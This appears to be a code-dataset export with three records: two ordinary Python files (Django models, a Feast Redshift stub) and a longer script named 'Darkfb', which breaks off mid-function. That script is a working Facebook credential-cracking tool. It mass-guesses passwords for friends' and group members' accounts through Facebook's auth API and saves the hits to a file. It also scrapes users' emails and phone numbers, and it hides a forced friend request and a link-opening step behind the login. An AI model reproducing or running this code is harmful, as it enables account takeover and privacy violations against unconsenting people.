blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f0604eb1eda455d4c3331f7ba6b004803d219ff0
|
bf23b069899d2a134804866bcddc8e82b1908ecc
|
/ag/reference/models.py
|
7243dc2137ac2939df62b8f7710cde7cbbd0ae4b
|
[] |
no_license
|
mcpelletier/ag2017_auf_org
|
87440741eda16436181e0774ed06ae13116dd8c0
|
23718dec8b62043337d4535dd5da1e58d64cef5c
|
refs/heads/master
| 2020-04-06T04:03:04.389839
| 2017-05-09T16:09:44
| 2017-05-09T16:09:57
| 83,065,128
| 0
| 0
| null | 2017-02-24T17:15:11
| 2017-02-24T17:15:11
| null |
UTF-8
|
Python
| false
| false
| 3,182
|
py
|
# -*- encoding: utf-8 -*-
from django.db import models
CODE_TITULAIRE = 'T'
CODE_ASSOCIE = 'A'
CODE_RESEAU = 'RES'
CODE_ETAB_ENSEIGNEMENT = 'ESR'
CODE_CENTRE_RECHERCHE = 'CIR'
class Pays(models.Model):
class Meta:
ordering = ('nom',)
code = models.CharField(max_length=2, unique=True)
nom = models.CharField(max_length=255)
sud = models.BooleanField()
def get_sud_display(self):
return u"sud" if self.sud else u"nord"
def __unicode__(self):
return self.nom
def __repr__(self):
return u"<Pays: {}>".format(self.nom)
class Region(models.Model):
class Meta:
ordering = ('nom',)
code = models.CharField(max_length=255, unique=True)
nom = models.CharField(max_length=255)
adresse = models.TextField(null=True)
implantation_bureau = models.ForeignKey('Implantation', null=True,
related_name='gere_region')
def __unicode__(self):
return self.nom
def __repr__(self):
return "<Région: {}>".format(self.id)
class Etablissement(models.Model):
class Meta:
ordering = ('nom', )
STATUT_CHOICES = (
(CODE_TITULAIRE, 'Titulaire'),
(CODE_ASSOCIE, 'Associé'),
('C', 'Candidat'),
)
QUALITE_CHOICES = (
(CODE_ETAB_ENSEIGNEMENT,
"Établissement d'enseignement supérieur et de recherche"),
(CODE_CENTRE_RECHERCHE, "Centre ou institution de recherche"),
(CODE_RESEAU, "Réseau"),
)
nom = models.CharField(max_length=255)
pays = models.ForeignKey(Pays)
region = models.ForeignKey(Region, blank=True, null=True,
verbose_name='région')
adresse = models.CharField(max_length=255, blank=True)
code_postal = models.CharField(u'code postal', max_length=20, blank=True)
ville = models.CharField(max_length=255, blank=True)
telephone = models.CharField(u'téléphone', max_length=255, blank=True)
fax = models.CharField(max_length=255, blank=True)
responsable_genre = models.CharField(u'genre', max_length=1, blank=True)
responsable_nom = models.CharField(u'nom', max_length=255, blank=True)
responsable_prenom = models.CharField(
u'prénom', max_length=255, blank=True
)
responsable_fonction = models.CharField(
u'fonction', max_length=255, blank=True
)
responsable_courriel = models.EmailField(u'courriel', blank=True)
statut = models.CharField(
max_length=1, choices=STATUT_CHOICES, blank=True, null=True)
qualite = models.CharField(
u'qualité', max_length=3, choices=QUALITE_CHOICES, blank=True,
null=True
)
membre = models.BooleanField(default=False)
def __unicode__(self):
return self.nom
def __repr__(self):
return u"<Établissement: {}-{}>".format(self.id, self.nom)
class Implantation(models.Model):
class Meta:
ordering = ('nom_court', )
nom = models.CharField(max_length=255)
nom_court = models.CharField(max_length=255, blank=True)
region = models.ForeignKey(Region, null=True)
def __unicode__(self):
return self.nom_court
|
[
"benselme@gmail.com"
] |
benselme@gmail.com
|
343fdac3f2f5608dce024042484943d8357628a0
|
d2bcaa6c021a965c5905053a512c83e5a72ce31a
|
/sdk/python/feast/infra/offline_stores/redshift.py
|
18509581118bb225c1c64e490e97de3212d35bfb
|
[
"Apache-2.0"
] |
permissive
|
Cimpress-MCP/feast
|
bafdbd29a99d9bda7f9cdedb91de5d9fc9ecf3c4
|
6eea808a6efdbf40949225f0bbd525fc0f03ab90
|
refs/heads/master
| 2023-06-23T03:29:54.288154
| 2021-07-15T17:32:31
| 2021-07-15T17:32:31
| 270,780,384
| 0
| 0
|
Apache-2.0
| 2021-07-15T17:56:53
| 2020-06-08T18:27:47
|
Python
|
UTF-8
|
Python
| false
| false
| 1,695
|
py
|
from datetime import datetime
from typing import List, Optional, Union
import pandas as pd
from pydantic import StrictStr
from pydantic.typing import Literal
from feast.data_source import DataSource
from feast.feature_view import FeatureView
from feast.infra.offline_stores.offline_store import OfflineStore, RetrievalJob
from feast.registry import Registry
from feast.repo_config import FeastConfigBaseModel, RepoConfig
class RedshiftOfflineStoreConfig(FeastConfigBaseModel):
""" Offline store config for AWS Redshift """
type: Literal["redshift"] = "redshift"
""" Offline store type selector"""
cluster_id: StrictStr
""" Redshift cluster identifier """
region: StrictStr
""" Redshift cluster's AWS region """
user: StrictStr
""" Redshift user name """
database: StrictStr
""" Redshift database name """
s3_path: StrictStr
""" S3 path for importing & exporting data to Redshift """
class RedshiftOfflineStore(OfflineStore):
@staticmethod
def pull_latest_from_table_or_query(
config: RepoConfig,
data_source: DataSource,
join_key_columns: List[str],
feature_name_columns: List[str],
event_timestamp_column: str,
created_timestamp_column: Optional[str],
start_date: datetime,
end_date: datetime,
) -> RetrievalJob:
pass
@staticmethod
def get_historical_features(
config: RepoConfig,
feature_views: List[FeatureView],
feature_refs: List[str],
entity_df: Union[pd.DataFrame, str],
registry: Registry,
project: str,
full_feature_names: bool = False,
) -> RetrievalJob:
pass
|
[
"noreply@github.com"
] |
Cimpress-MCP.noreply@github.com
|
ebfc8a9392625461ceff2085805d5e8cc562e424
|
e96590c1474a2267c99bd1aed81f4c3e3f056e93
|
/Darkfb
|
fbba1679a85f35f8c03cecaebbb01ded66a4aebd
|
[] |
no_license
|
Warriors12-pl/Imsenza
|
a72e66491d28e59c6cd8d36c5f30e8bcaef99963
|
9ca5e03f9cbce957fa56ef763c0fa4ae3b1a19d2
|
refs/heads/master
| 2022-11-17T14:54:14.568507
| 2020-07-18T17:46:06
| 2020-07-18T17:46:06
| 280,707,732
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 33,179
|
#!/usr/bin/python2
# coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(x):
w = 'mhkbpcP'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(x):
w = 'mhkbpcP'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.05)
logo = """ \x1b[1;93m______ \x1b[1;92m_______ \x1b[1;94m______ \x1b[1;91m___ _\n \x1b[1;93m| | \x1b[1;92m| _ |\x1b[1;94m| _ | \x1b[1;91m| | | |\n \x1b[1;93m| _ |\x1b[1;92m| |_| |\x1b[1;94m| | || \x1b[1;91m| |_| |\n \x1b[1;93m| | | |\x1b[1;92m| |\x1b[1;94m| |_||_ \x1b[1;91m| _|\n \x1b[1;93m| |_| |\x1b[1;92m| |\x1b[1;94m| __ |\x1b[1;91m| |_ \n \x1b[1;93m| |\x1b[1;92m| _ |\x1b[1;94m| | | |\x1b[1;91m| _ |\n \x1b[1;93m|______| \x1b[1;92m|__| |__|\x1b[1;94m|___| |_|\x1b[1;91m|___| |_| \x1b[1;96mFB\n\n \x1b[1;95m●▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬●\n ✫╬─ \x1b[1;92mReCode \x1b[1;91m: \x1b[1;93mimsenza \x1b[1;95m─╬✫\n ✫╬─ \x1b[1;92mFB \x1b[1;92m \x1b[1;91m: \x1b[1;96mFacebook.com/imsenza \x1b[1;95m─╬✫\n ✫╬─ \x1b[1;92mGitHub \x1b[1;91m: \x1b[1;94mGithub.com/imsenza \x1b[1;95m─╬✫\n ●▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬●
"""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[●] \x1b[1;93mSedang masuk \x1b[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
def siapa():
os.system('clear')
nama = raw_input("\033[1;97mSiapa nama kamu ? \033[1;91m: \033[1;92m")
if nama =="":
print"\033[1;96m[!] \033[1;91mIsi yang benar"
time.sleep(1)
siapa()
else:
os.system('clear')
jalan("\033[1;97mSelamat datang \033[1;92m" +nama+ "\n\033[1;97mTerimakasih telah menggunakan tools ini !!")
time.sleep(1)
loginSC()
def loginSC():
os.system('clear')
print"\033[1;97mSilahkan login SC nya dulu bosque\n"
username = raw_input("\033[1;96m[*] \033[1;97mUsername \033[1;91m: \033[1;92m")
password = raw_input("\033[1;96m[*] \033[1;97mPassword \033[1;91m: \033[1;92m")
if username =="im" and password =="senza":
print"\033[1;96m[✓] \033[1;92mLogin success"
time.sleep(1)
login()
else:
print"\033[1;96m[!] \033[1;91mSalah!!"
time.sleep(1)
LoginSC()
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print 42*"\033[1;96m="
print('\033[1;96m[☆] \x1b[1;93mLOGIN AKUN FACEBOOK ANDA \x1b[1;96m[☆]' )
id = raw_input('\033[1;96m[+] \x1b[1;93mID/Email \x1b[1;91m: \x1b[1;92m')
pwd = raw_input('\033[1;96m[+] \x1b[1;93mPassword \x1b[1;91m: \x1b[1;92m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\033[1;96m[✓] \x1b[1;92mLogin Berhasil'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
os.system('xdg-open https://www.youtube.com/omaliptv')
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
if 'checkpoint' in url:
print("\n\033[1;96m[!] \x1b[1;91mSepertinya akun anda kena checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;96m[!] \x1b[1;91mPassword/Email salah")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;96m[!] \033[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
os.system("clear")
print logo
print 42*"\033[1;96m="
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m Nama \033[1;91m: \033[1;92m"+nama+"\033[1;97m "
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m ID \033[1;91m: \033[1;92m"+id+"\x1b[1;97m "
print 42*"\033[1;96m="
print "\x1b[1;97m1.\x1b[1;93m Hack facebook MBF"
print "\x1b[1;97m2.\x1b[1;93m Lihat daftar grup "
print "\x1b[1;97m3.\x1b[1;93m Informasi akun "
print "\x1b[1;97m4.\x1b[1;93m Yahoo clone "
print "\n\x1b[1;91m0.\x1b[1;91m Logout "
pilih()
def pilih():
unikers = raw_input("\n\033[1;97m >>> \033[1;97m")
if unikers =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih()
elif unikers =="1":
super()
elif unikers =="2":
grupsaya()
elif unikers =="3":
informasi()
elif unikers =="4":
yahoo()
elif unikers =="0":
os.system('clear')
jalan('Menghapus token')
os.system('rm -rf login.txt')
keluar()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;97m1.\x1b[1;93m Crack dari daftar teman"
print "\x1b[1;97m2.\x1b[1;93m Crack dari teman"
print "\x1b[1;97m3.\x1b[1;93m Crack dari member grup"
print "\x1b[1;97m4.\x1b[1;93m Crack dari file"
print "\n\x1b[1;91m0.\x1b[1;91m Kembali"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;97m >>> \033[1;97m")
if peak =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print 42*"\033[1;96m="
jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mMasukan ID teman \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama teman\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan!"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
print 42*"\033[1;96m="
idg=raw_input('\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+idg+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
re=requests.get('https://graph.facebook.com/'+idg+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for p in s['data']:
id.append(p['id'])
elif peak =="4":
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
idlist = raw_input('\x1b[1;96m[+] \x1b[1;93mMasukan nama file \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;96m[!] \x1b[1;91mFile tidak ditemukan'
raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih_super()
print "\033[1;96m[+] \033[1;93mTotal ID \033[1;91m: \033[1;97m"+str(len(id))
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[\033[1;97m✸\033[1;96m] \033[1;93mCrack \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass1 + '\n'
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass1 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass2 + '\n'
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass2 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass3 + '\n'
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass3 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = 'Bangsat'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass4 + '\n'
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass4 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
birthday = b['birthday']
pass5 = birthday.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass5 + '\n'
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass5 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = 'Sayang'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass6 + '\n'
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass6 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;96m[+] \033[1;92mCP File tersimpan \033[1;91m: \033[1;97mout/super_cp.txt")
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
def grupsaya():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token='+toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p["name"]
id = p["id"]
f=open('out/Grupid.txt','w')
listgrup.append(id)
f.write(id + '\n')
print("\033[1;96m[✓] \033[1;92mGROUP SAYA")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+str(id))
print("\033[1;96m[➹] \033[1;97mNama\033[1;91m: \033[1;92m"+str(nama) + '\n')
print 42*"\033[1;96m="
print"\033[1;96m[+] \033[1;92mTotal Group \033[1;91m:\033[1;97m %s"%(len(listgrup))
print("\033[1;96m[+] \033[1;92mTersimpan \033[1;91m: \033[1;97mout/Grupid.txt")
f.close()
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except (KeyboardInterrupt,EOFError):
print("\033[1;96m[!] \x1b[1;91mTerhenti")
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except KeyError:
os.remove('out/Grupid.txt')
print('\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan')
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except requests.exceptions.ConnectionError:
print"\033[1;96m[✖] \x1b[1;91mTidak ada koneksi"
keluar()
except IOError:
print "\033[1;96m[!] \x1b[1;91mError"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def informasi():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print 42*"\033[1;96m="
aid = raw_input('\033[1;96m[+] \033[1;93mMasukan ID/Nama\033[1;91m : \033[1;97m')
jalan('\033[1;96m[✺] \033[1;93mTunggu sebentar \033[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
cok = json.loads(r.text)
for i in cok['data']:
if aid in i['name'] or aid in i['id']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
print 43*"\033[1;96m="
try:
print '\033[1;96m[➹] \033[1;93mNama\033[1;97m : '+z['name']
except KeyError: print '\033[1;96m[?] \033[1;93mNama\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mID\033[1;97m : '+z['id']
except KeyError: print '\033[1;96m[?] \033[1;93mID\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mEmail\033[1;97m : '+z['email']
except KeyError: print '\033[1;96m[?] \033[1;93mEmail\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mNo HP\033[1;97m : '+z['mobile_phone']
except KeyError: print '\033[1;96m[?] \033[1;93mNo HP\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mTempat tinggal\033[1;97m: '+z['location']['name']
